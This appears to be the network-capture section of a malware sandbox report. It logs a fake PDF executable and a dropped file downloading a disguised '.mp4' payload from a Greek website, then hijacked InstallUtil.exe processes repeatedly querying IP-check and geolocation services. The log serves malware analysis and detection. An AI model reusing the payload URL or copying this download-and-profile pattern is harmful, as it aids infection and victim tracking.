                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Connection: Keep-Alive
                                                              Nov 11, 2024 05:17:15.378827095 CET | 322 | IN | HTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:15 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 105
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: 7aa49dd46f1164773685030061d83622
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              11 | 192.168.2.5 | 49764 | 132.226.247.73 | 80 | 1476 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 11, 2024 05:17:15.958626032 CET | 151 | OUT | GET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Connection: Keep-Alive
                                                              Nov 11, 2024 05:17:16.616981983 CET | 322 | IN | HTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:16 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 105
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: 85278c1e26254b16fb407b114464cb00
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              12 | 192.168.2.5 | 49776 | 132.226.247.73 | 80 | 1476 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 11, 2024 05:17:17.161007881 CET | 151 | OUT | GET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Connection: Keep-Alive
                                                              Nov 11, 2024 05:17:17.818900108 CET | 322 | IN | HTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:17 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 105
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: 460f4b70821cad0a4fd957f3bcc732c5
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              13 | 192.168.2.5 | 49788 | 132.226.247.73 | 80 | 1476 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 11, 2024 05:17:18.364017963 CET | 151 | OUT | GET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Connection: Keep-Alive
                                                              Nov 11, 2024 05:17:19.022644043 CET | 322 | IN | HTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:18 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 105
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: 39132491ee4a31a156853471a779de7f
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              0 | 192.168.2.5 | 49704 | 185.78.221.73 | 443 | 7088 | C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-11-11 04:16:53 UTC | 85 | OUT | GET /slim/Tvifaznhqk.mp4 HTTP/1.1
                                                              Host: www.oleonidas.gr
                                                              Connection: Keep-Alive
                                                              2024-11-11 04:16:53 UTC | 298 | IN | HTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:16:53 GMT
                                                              Server: Apache
                                                              Last-Modified: Mon, 11 Nov 2024 00:29:38 GMT
                                                              Accept-Ranges: bytes
                                                              Content-Length: 954376
                                                              Cache-Control: max-age=1209600
                                                              Expires: Mon, 25 Nov 2024 04:16:53 GMT
                                                              Vary: User-Agent
                                                              Connection: close
                                                              Content-Type: video/mp4


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              1 | 192.168.2.5 | 49706 | 188.114.96.3 | 443 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-11-11 04:16:57 UTC | 86 | OUT | GET /xml/66.23.206.109 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              Connection: Keep-Alive
                                                              2024-11-11 04:16:57 UTC | 839 | IN | HTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:16:57 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 363
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: MISS
                                                              Last-Modified: Mon, 11 Nov 2024 04:16:57 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tM5YmCthsoj3vjzbycqikT34TZYAAYiZFBvW%2ByFWEMhCUo%2BCsO%2FEMLuSJkiZTPf7XN7aMxI9aZP2Jk0F7Dw9ynoUgAn1asbgW5DYoabnxdCC4WCgHE2ipR85O2ddmmAxYBs870XI"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e0b7845cc0f0f80-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1291&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=700&delivery_rate=2292953&cwnd=243&unsent_bytes=0&cid=966992ebb9e02c84&ts=898&x=0"
                                                              2024-11-11 04:16:57 UTC363INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a
                                                              Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              2 | 192.168.2.5 | 49707 | 188.114.96.3 | 443 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-11-11 04:16:58 UTC | 62 | OUT | GET /xml/66.23.206.109 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              2024-11-11 04:16:58 UTC | 852 | IN | HTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:16:58 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 363
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 1
                                                              Last-Modified: Mon, 11 Nov 2024 04:16:57 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FHrh%2BfLljH9rrsz6GU5tl7weFTENEoJ4G4aWSzgyMlMWbdhjftzMa%2FTfKQpH6Bt25pF%2BKic7Erqa1rcdO%2BI5SHOAXoEikSFMo9IQhHcIjaXlU84YwT6E5WAUMPZYMiKmC3CiY%2F38"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e0b784ca9d672b3-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1308&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=700&delivery_rate=2184012&cwnd=251&unsent_bytes=0&cid=bb4a1c1e3d2a1f96&ts=122&x=0"
                                                              2024-11-11 04:16:58 UTC363INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a
                                                              Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              3 | 192.168.2.5 | 49709 | 188.114.96.3 | 443 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-11-11 04:16:59 UTC | 86 | OUT | GET /xml/66.23.206.109 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              Connection: Keep-Alive
                                                              2024-11-11 04:17:00 UTC | 848 | IN | HTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:00 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 363
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: MISS
                                                              Last-Modified: Mon, 11 Nov 2024 04:17:00 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N%2FqGZTZx0YexjC1elktikxL6fsBpq8fadPC4O08AGB2qHtv%2B%2BTN6GKrb4Vnhu0uFa5HVJ1y%2F0rubaSwWbHSL5Fs4b8xvYrfxPQIu%2F%2FMOiVHjd5tiISuYq79W%2BUp%2BDWSUY5vyjv6E"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e0b7856de0c80fb-NRT
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=156230&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=700&delivery_rate=18531&cwnd=32&unsent_bytes=0&cid=2f3a7f1e022e5fc9&ts=818&x=0"
                                                              2024-11-11 04:17:00 UTC | 363 | IN | Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              4 | 192.168.2.5 | 49711 | 188.114.96.3 | 443 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-11-11 04:17:01 UTC | 62 | OUT | GET /xml/66.23.206.109 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              2024-11-11 04:17:01 UTC | 852 | IN | HTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:01 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 363
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 4
                                                              Last-Modified: Mon, 11 Nov 2024 04:16:57 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wzq5oJbVOK2kXn3a4G8O%2BelkCYNkk0lkyll5XRobzJgEN2BpVgdu%2Bi4%2Boeatao2sdcB5iIZNb%2BFbzPyTJCWCnPIipTsxNVsEo8vzvWpeb3ra2a4XeDVqilsuaGMK3%2BDtmaG%2FhKpl"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e0b78622dcede97-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1128&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=700&delivery_rate=2413333&cwnd=208&unsent_bytes=0&cid=188bee9d59f55bb1&ts=107&x=0"
                                                              2024-11-11 04:17:01 UTC | 363 | IN | Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              5 | 192.168.2.5 | 49713 | 188.114.96.3 | 443 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-11-11 04:17:02 UTC | 62 | OUT | GET /xml/66.23.206.109 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              2024-11-11 04:17:03 UTC | 846 | IN | HTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:03 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 363
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 6
                                                              Last-Modified: Mon, 11 Nov 2024 04:16:57 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ONWN11y6kRAjar3Va%2FISwUeYts0oYYo03dJQ0tf7papVvg79qOnilRO11r2gvLz6IWsC44T8mzFcO7gVFUshqfQX4Sn9ciLJDBkn3qffBKAxkDYfl3uD%2BKBkEuhx1bXSvCTWa%2BKZ"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e0b7869ccfac34a-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1382&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=700&delivery_rate=2159582&cwnd=250&unsent_bytes=0&cid=132ad932efc45d56&ts=118&x=0"
                                                              2024-11-11 04:17:03 UTC | 363 | IN | Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              6 | 192.168.2.5 | 49715 | 188.114.96.3 | 443 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-11-11 04:17:04 UTC | 86 | OUT | GET /xml/66.23.206.109 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              Connection: Keep-Alive
                                                              2024-11-11 04:17:04 UTC | 848 | IN | HTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:04 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 363
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 7
                                                              Last-Modified: Mon, 11 Nov 2024 04:16:57 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cTXSmA8luHts2ycUxc2hVUqxjLjuOZgbZLRwsEmimgHwYdR%2Fd2ZBc5MVY3TzCGSDMsAWUED9kEnn2tn0gtZQ7hACqAiEXFlZrR8Yw3Qu7qL%2FGF6uhIUUS%2B2xVz9FXWAVpetmuRW%2F"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e0b78715dde0f71-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1291&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=700&delivery_rate=2464680&cwnd=251&unsent_bytes=0&cid=c7ed5a698b10dbdb&ts=116&x=0"
                                                              2024-11-11 04:17:04 UTC | 363 | IN | Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              7 | 192.168.2.5 | 49717 | 188.114.96.3 | 443 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-11-11 04:17:05 UTC | 62 | OUT | GET /xml/66.23.206.109 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              2024-11-11 04:17:05 UTC | 846 | IN | HTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:05 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 363
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 8
                                                              Last-Modified: Mon, 11 Nov 2024 04:16:57 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rAbJpEB%2B4BVP98ncoVCERLQgia1oUoxR1CbpPfw2o4F5OtF9L4sQwpTA5VbE3pYEvHmxTJbdChyOqKPrzY2zRd6arNPPGOrncm%2BvRtmkRuh8f7aq5pZH4%2BC0FqknNaczuADT1SwV"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e0b78792efa4286-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1257&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=700&delivery_rate=2227692&cwnd=251&unsent_bytes=0&cid=824202ff8c8a7b00&ts=160&x=0"
                                                              2024-11-11 04:17:05 UTC | 363 | IN | Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              8 | 192.168.2.5 | 49720 | 188.114.96.3 | 443 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-11-11 04:17:06 UTC | 86 | OUT | GET /xml/66.23.206.109 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              Connection: Keep-Alive
                                                              2024-11-11 04:17:06 UTC | 854 | IN | HTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:06 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 363
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 9
                                                              Last-Modified: Mon, 11 Nov 2024 04:16:57 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LWEta9laZcN8CvT%2Fz04LD0b4XhbpqiHQ1YxALvej0zGyEhcmJHS0%2BLilAxQ%2FJ0%2B6G%2FmGhFCvZifDhzNR65g8k9vhH2Atz3a7RNo7ro3yxsXVrLIvmYObdTaiE%2F%2BW8oDjSJURA4cj"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e0b7880da6a185d-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1317&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=700&delivery_rate=2083453&cwnd=251&unsent_bytes=0&cid=e8f23afa6e956609&ts=118&x=0"
                                                              2024-11-11 04:17:06 UTC | 363 | IN | Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              9 | 192.168.2.5 | 49719 | 185.78.221.73 | 443 | 6512 | C:\Users\user\AppData\Roaming\TypeName.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-11-11 04:17:06 UTC | 85 | OUT | GET /slim/Tvifaznhqk.mp4 HTTP/1.1
                                                              Host: www.oleonidas.gr
                                                              Connection: Keep-Alive
                                                              2024-11-11 04:17:07 UTC | 298 | IN | HTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:07 GMT
                                                              Server: Apache
                                                              Last-Modified: Mon, 11 Nov 2024 00:29:38 GMT
                                                              Accept-Ranges: bytes
                                                              Content-Length: 954376
                                                              Cache-Control: max-age=1209600
                                                              Expires: Mon, 25 Nov 2024 04:17:07 GMT
                                                              Vary: User-Agent
                                                              Connection: close
                                                              Content-Type: video/mp4


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              10 | 192.168.2.5 | 49725 | 188.114.96.3 | 443 | 1476 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-11-11 04:17:10 UTC | 86 | OUT | GET /xml/66.23.206.109 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              Connection: Keep-Alive
                                                              2024-11-11 04:17:11 UTC | 853 | IN | HTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:10 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 363
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 13
                                                              Last-Modified: Mon, 11 Nov 2024 04:16:57 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GBng3lU38YtU1HRPtYkTeRgAElJHAxSydXt%2FYUSNvuN4Sw7rwFPZp4cmo3GRCXknzq4t2kVh5oP3Bdpv2kV1jyU%2BRb86Hg7VhXE%2FXNnRqlKVO8BUnUbLSYeopnm%2FETJe4%2BlLQS%2BT"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e0b789b9f6d41ed-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1182&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=700&delivery_rate=2439764&cwnd=251&unsent_bytes=0&cid=b8c503b0475f9fa4&ts=476&x=0"
                                                              2024-11-11 04:17:11 UTC | 363 | IN | Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              11 | 192.168.2.5 | 49730 | 188.114.96.3 | 443 | 1476 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-11-11 04:17:11 UTC | 62 | OUT | GET /xml/66.23.206.109 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              2024-11-11 04:17:11 UTC | 847 | IN | HTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:11 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 363
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 14
                                                              Last-Modified: Mon, 11 Nov 2024 04:16:57 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JLSTShcQCVNmbyKRT4ELVdSkr1C%2BFd4ZpI3ohNVe8qqyHjmmyqleN%2BuHmGmVAlCSSsqOcKsCC5TMmKkQcuHVsBw3hSCDTusVflOAtMT0iHp6G1Xluqm4kGgSFSX%2F7NlaaTv9cgoN"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e0b78a10ac772ab-EWR
                                                              alt-svc: h3=":443"; ma=86400
